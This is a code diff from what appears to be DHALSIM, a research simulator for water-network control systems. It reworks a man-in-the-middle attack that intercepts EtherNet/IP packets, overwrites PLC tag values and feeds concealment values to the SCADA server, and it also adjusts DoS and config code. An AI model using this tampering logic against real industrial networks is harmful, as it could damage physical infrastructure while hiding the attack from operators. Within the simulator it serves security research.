Merge pull request #32 from afmurillo/dev-paper

Multiple fixes on new attacks

Author: afmurillo

dhalsim/network_attacks/concealment_netfilter_queue.py

@@ -22,22 +22,116 @@ class ConcealmentMiTMNetfilterQueue(PacketQueue):
 
     def __init__(self,  intermediate_yaml_path: Path, yaml_index: int, queue_number: int ):
         super().__init__(intermediate_yaml_path, yaml_index, queue_number)
-        self.attacked_tag = self.intermediate_attack['tag']
+        self.attacked_tags = self.intermediate_attack['tags']
+        self.logger.debug('Attacked tags:' + str(self.attacked_tags))
         self.scada_session_ids = []
         self.attack_session_ids = []
         self.concealment_type = None
 
         if 'concealment_data' in self.intermediate_attack.keys():
             if self.intermediate_attack['concealment_data']['type'] == 'path':
                 self.concealment_type = 'path'
-                self.concealment_data_pd = pd.read_csv(self.intermediate_attack['concealment_data'])
+                self.concealment_data_pd = pd.read_csv(self.intermediate_attack['concealment_data']['path'])
             elif self.intermediate_attack['concealment_data']['type'] == 'value':
                 self.concealment_type = 'value'
             else:
                 raise ConcealmentError("Concealment data type is invalid, supported values are 'concealment_value' or 'concealment_path ")
 
         self.logger.debug('Concealment type is: ' + str(self.concealment_type))
 
+    def get_attack_tag(self, a_tag_name):
+        self.logger.debug('attacked tags: ' + str(self.attacked_tags))
+        for tag in self.attacked_tags:
+            if tag['tag'] == a_tag_name:
+                return tag
+
+    def handle_attack(self, session, ip_payload):
+        # We support multi tag sending, using the same session. Context varies among tags
+        for tag in self.intermediate_attack['tags']:
+            if session['tag'] == tag['tag']:
+                modified = True
+                if 'value' in tag.keys():
+                    self.logger.debug('attacking with value')
+                    return translate_float_to_payload(tag['value'], ip_payload[Raw].load)
+
+                elif 'offset' in tag.keys():
+                    self.logger.debug('attacking with offset')
+                    return translate_float_to_payload(
+                        translate_payload_to_float(ip_payload[Raw].load) + tag['offset'],
+                        ip_payload[Raw].load), modified
+
+    def handle_concealment(self, session, ip_payload):
+        if self.intermediate_attack['concealment_data']['type'] == 'value' or \
+                self.intermediate_attack['concealment_data']['type'] == 'offset':
+            for tag in self.intermediate_attack['concealment_data']['concealment_value']:
+                if session['tag'] == tag['tag']:
+                    modified = True
+                    if self.intermediate_attack['concealment_data']['type']:
+                        self.logger.debug('Concealment value is: ' + str(tag['value']))
+                        return translate_float_to_payload(tag['value'], ip_payload[Raw].load)
+                    elif self.intermediate_attack['concealment_data']['type'] == 'offset':
+                        self.logger.debug('Concealment offset is: ' + str(tag['offset']))
+                        return translate_float_to_payload(
+                            translate_payload_to_float(ip_payload[Raw].load) + tag['offset'],
+                            ip_payload[Raw].load), modified
+        elif self.intermediate_attack['concealment_data']['type'] == 'path':
+            self.logger.debug('Concealing to SCADA with path')
+            exp = (self.concealment_data_pd['iteration'] == self.get_master_clock())
+            concealment_value = float(self.concealment_data_pd.loc[exp][session['tag']].values[-1])
+            self.logger.debug('Concealing with value: ' + str(concealment_value))
+            modified = True
+            return translate_float_to_payload(concealment_value, ip_payload[Raw].load), modified
+
+    def handle_enip_response(self, ip_payload):
+        this_session = int.from_bytes(ip_payload[Raw].load[4:8], sys.byteorder)
+        this_context = int.from_bytes(ip_payload[Raw].load[12:20], sys.byteorder)
+
+        self.logger.debug('ENIP response session: ' + str(this_session))
+        self.logger.debug('ENIP response context: ' + str(this_context))
+
+        # When target is SCADA, the concealment session will be stored in attack_session_ids
+        if self.intermediate_attack['target'].lower() == 'scada':
+            for session in self.attack_session_ids:
+                if session['session'] == this_session and session['context'] == this_context:
+                    self.logger.debug('Concealing to SCADA: ' + str(this_session))
+                    return self.handle_concealment(session, ip_payload)
+
+        # Attack values to PLCs
+        for session in self.attack_session_ids:
+            if session['session'] == this_session and session['context'] == this_context:
+                return self.handle_attack(session, ip_payload)
+
+        # Concealment values to SCADA
+        for session in self.scada_session_ids:
+            if session['session'] == this_session and session['context'] == this_context:
+                self.logger.debug('Concealing to SCADA: ' + str(this_session))
+                return self.handle_concealment(session, ip_payload)
+
+        modified = False
+        return ip_payload, modified
+
+    def handle_enip_request(self, ip_payload, offset):
+
+        this_session = int.from_bytes(ip_payload[Raw].load[4:8], sys.byteorder)
+        tag_name = ip_payload[Raw].load.decode(encoding='latin-1')[54:offset]
+        context = int.from_bytes(ip_payload[Raw].load[12:20], sys.byteorder)
+
+        self.logger.debug('this tag is: ' + str(tag_name))
+        this_tag = self.get_attack_tag(tag_name)
+
+        if this_tag:
+            #self.logger.debug('Tag name: ' + str(tag_name))
+            self.logger.debug('Attack tag: ' + str(this_tag['tag']))
+            session_dict = {'session': this_session, 'tag': this_tag['tag'], 'context': context}
+            self.logger.debug('session dict: ' + str(session_dict))
+
+            if ip_payload[IP].src == self.intermediate_yaml['scada']['public_ip']:
+                self.logger.debug('SCADA Req session')
+                self.scada_session_ids.append(session_dict)
+            else:
+                self.logger.debug('PLC Req session')
+                self.attack_session_ids.append(session_dict)
+
     def capture(self, packet):
         """
         This function is the function that will run in the thread started in the setup function.
@@ -47,65 +141,34 @@ def capture(self, packet):
         packet and delete the original checksum.
         :param packet: The captured packet.
         """
+
         try:
             p = IP(packet.get_payload())
             if 'TCP' in p:
-                self.logger.debug('TCP packet')
-                if len(p) == 118:
-                    this_session = int.from_bytes(p[Raw].load[4:8], sys.byteorder)
-                    tag_name = p[Raw].load.decode(encoding='latin-1')[54:57]
-                    self.logger.debug('Tag name: ' + str(tag_name))
-                    self.logger.debug('Attack tag: ' + self.attacked_tag)
-                    if self.attacked_tag == tag_name:
-                        # This is a packet being sent to SCADA server, conceal the manipulation
-                        if p[IP].src == self.intermediate_yaml['scada']['public_ip']:
-                            self.logger.debug('SCADA Req session')
-                            self.scada_session_ids.append(this_session)
-                        else:
-                            self.logger.debug('PLC Req session')
-                            self.attack_session_ids.append(this_session)
-
                 if len(p) == 102:
-                    this_session = int.from_bytes(p[Raw].load[4:8], sys.byteorder)
-
-                    if this_session in self.attack_session_ids:
-                        #value = translate_payload_to_float(p[Raw].load)
-
-                        if 'value' in self.intermediate_attack.keys():
-                            p[Raw].load = translate_float_to_payload(
-                                self.intermediate_attack['value'], p[Raw].load)
-                        elif 'offset' in self.intermediate_attack.keys():
-                            p[Raw].load = translate_float_to_payload(
-                                translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
-                                    'offset'], p[Raw].load)
-
+                    p[Raw].load, modified = self.handle_enip_response(p)
+                    if modified:
                         del p[IP].chksum
                         del p[TCP].chksum
-
                         packet.set_payload(bytes(p))
-                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
-
-
-                    elif this_session in self.scada_session_ids:
-                        self.logger.debug('Concealing to SCADA: ' + str(this_session))
-
-                        if self.concealment_type == 'path':
-                            exp = (self.concealment_data_pd['iteration'] == self.get_master_clock())
-                            concealment_value = float(self.concealment_data_pd.loc[exp][self.attacked_tag].values[-1])
-                            self.logger.debug('Concealing with value: ' + str(concealment_value))
-                            p[Raw].load = translate_float_to_payload(concealment_value, p[Raw].load)
-                        elif self.concealment_type == 'value':
-                            concealment_value = self.intermediate_attack['concealment_data']['concealment_value']
-                            self.logger.debug('Concealment value is: ' + str(concealment_value))
-                            p[Raw].load = translate_float_to_payload(concealment_value, p[Raw].load)
-
-                        del p[IP].chksum
-                        del p[TCP].chksum
-
-                        packet.set_payload(bytes(p))
-                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+                    packet.accept()
+                    return
+
+                else:
+                    if len(p) == 118:
+                        self.logger.debug('handling request 57')
+                        self.handle_enip_request(p, 57)
+                        self.logger.debug('handled request')
+                    elif len(p) == 116:
+                        self.logger.debug('handling request 56')
+                        self.handle_enip_request(p, 56)
+                        self.logger.debug('handled request')
+                    else:
+                        packet.accept()
+                        return
 
             packet.accept()
+
         except Exception as exc:
             print(exc)
             if self.nfqueue:

dhalsim/network_attacks/simple_dos_attack.py

@@ -131,6 +131,7 @@ def teardown(self):
         os.system('iptables -D INPUT -p icmp -j DROP')
         os.system('iptables -D OUTPUT -p icmp -j DROP')
 
+        self.run_thread = False
         nfqueue.unbind()
         self.logger.debug("[*] Stopping water level spoofing")
 
@@ -170,4 +171,4 @@ def is_valid_file(parser_instance, arg):
     attack = SimpleDoSAttack(
         intermediate_yaml_path=Path(args.intermediate_yaml),
         yaml_index=args.index)
-    attack.main_loop()
+    attack.main_loop()

dhalsim/network_attacks/synced_attack.py

@@ -63,6 +63,9 @@ def __init__(self, intermediate_yaml_path: Path, yaml_index: int):
             if plc['name'] == self.intermediate_attack['target']:
                 self.intermediate_plc = plc
 
+        if self.intermediate_attack['target'].lower() == 'scada':
+            self.intermediate_plc = self.intermediate_yaml['scada']
+
         self.attacker_ip = self.intermediate_attack['local_ip']
         self.target_plc_ip = self.intermediate_plc['local_ip']
 
@@ -305,7 +308,6 @@ def main_loop(self):
                 pass
 
             self.set_sync(3)
-            self.logger.debug("Setting sync in 3")
 
     @abstractmethod
     def attack_step(self):

dhalsim/parser/config_parser.py

@@ -92,9 +92,14 @@ class SchemaParser:
                     Use(str.lower),
                     'value'
                 ),
-                'concealment_value': And(
-                    Or(float, And(int, Use(float))),
-                )
+                'concealment_value': [{
+                    'tag': And(
+                        str,
+                        string_pattern,
+                    ),
+                    Or('value', 'offset', only_one=True,
+                       error="'tags' should have either a 'value' or 'offset' attribute."): Or(float, And(int, Use(float))),
+                }],
             },
             {
                 'type': And(
@@ -310,13 +315,14 @@ class SchemaParser:
                     str,
                     string_pattern
                 ),
-                'tag': And(
-                    str,
-                    string_pattern,
-                ),
-                'value': And(
-                    Or(float, And(int, Use(float)))
-                ),
+                'tags': [{
+                    'tag': And(
+                        str,
+                        string_pattern,
+                    ),
+                    Or('value', 'offset', only_one=True,
+                       error="'tags' should have either a 'value' or 'offset' attribute."): Or(float, And(int, Use(float))),
+                }],
                 'concealment_data': concealment_data
             },
             {
@@ -717,7 +723,7 @@ def generate_network_attacks(self):
                 target = network_attack['target']
 
                 # Network attacks to SCADA do not need a target plc
-                if target == 'scada':
+                if target.lower() == 'scada':
                     continue
 
                 target_plc = None
@@ -737,6 +743,9 @@ def generate_network_attacks(self):
                         raise NoSuchTag(
                             f"PLC {target_plc['name']} does not have all the tags specified.")
 
+                #todo: Checks for concealment_mitm
+
+
             return network_attacks
         return []
 

dhalsim/python2/generic_scada.py

@@ -93,6 +93,10 @@ def __init__(self, intermediate_yaml_path):
         self.update_cache_flag = False
         self.plcs_ready = False
 
+        self.previous_cache = {}
+        for ip in self.plc_data:
+            self.previous_cache[ip] = [0] * len(self.plc_data[ip])
+
         self.cache = {}
         for ip in self.plc_data:
             self.cache[ip] = [0] * len(self.plc_data[ip])
@@ -286,6 +290,7 @@ def update_cache(self, lock, cache_update_time):
 
         while self.update_cache_flag:
             for plc_ip in self.cache:
+                # Maintain old values if there could not be uploaded
                 try:
                     values = self.receive_multiple(self.plc_data[plc_ip], plc_ip)
                     with lock:
@@ -295,8 +300,8 @@ def update_cache(self, lock, cache_update_time):
                         "PLC receive_multiple with tags {tags} from {ip} failed with exception '{e}'".format(
                             tags=self.plc_data[plc_ip],
                             ip=plc_ip, e=str(e)))
-                    time.sleep(cache_update_time)
                     continue
+
                 #self.logger.debug(
                 #    "SCADA cache updated for {tags}, with value {values}, from {ip}".format(tags=self.plc_data[plc_ip],
                 #                                                                             values=values,
@@ -322,7 +327,6 @@ def main_loop(self, sleep=0.5, test_break=False):
             while not self.get_sync(2):
                 pass
 
-            # Wait until we acquire the first sync before polling the PLCs
             if not self.plcs_ready:
                 self.plcs_ready = True
                 self.update_cache_flag = True
@@ -334,7 +338,13 @@ def main_loop(self, sleep=0.5, test_break=False):
             results = [master_time, datetime.now()]
             with lock:
                 for plc_ip in self.plc_data:
-                    results.extend(self.cache[plc_ip])
+                    if self.cache[plc_ip]:
+                        results.extend(self.cache[plc_ip])
+                    else:
+                        results.extend(self.previous_cache[plc_ip])
+
+                self.previous_cache[plc_ip] = self.cache[plc_ip]
+
             self.saved_values.append(results)
 
             # Save scada_values.csv when needed

dhalsim/python2/topo/complex_topo.py

@@ -154,7 +154,7 @@ def generate_data(self, data):
         if 'network_attacks' in self.data.keys():
             for attack in data['network_attacks']:
                 target = next((plc for plc in data['plcs'] if plc['name'] == attack['target']), None)
-                if attack['target'] == 'scada':
+                if attack['target'].lower() == 'scada':
                     target = data['scada']
                 if not target:
                     raise NoSuchPlc("The target plc {name} does not exist".format(name=attack['target']))

examples/anytown_topology/anytown_concealment_mitm.yaml

@@ -6,7 +6,8 @@ network_attacks:
   value: 8.0
   concealment_data:
     type: value
-    concealment_value: 42.0
+    concealment_value:
+      - tag:
     #type: path
     #path: concealment_test.csv
   trigger:

examples/anytown_topology/anytown_config.yaml

@@ -9,3 +9,4 @@ demand: pdd
 log_level: debug
 demand_patterns: demands_anytown_small.csv
 #attacks: !include anytown_concealment_mitm.yaml
+attacks: !include anytown_dos.yaml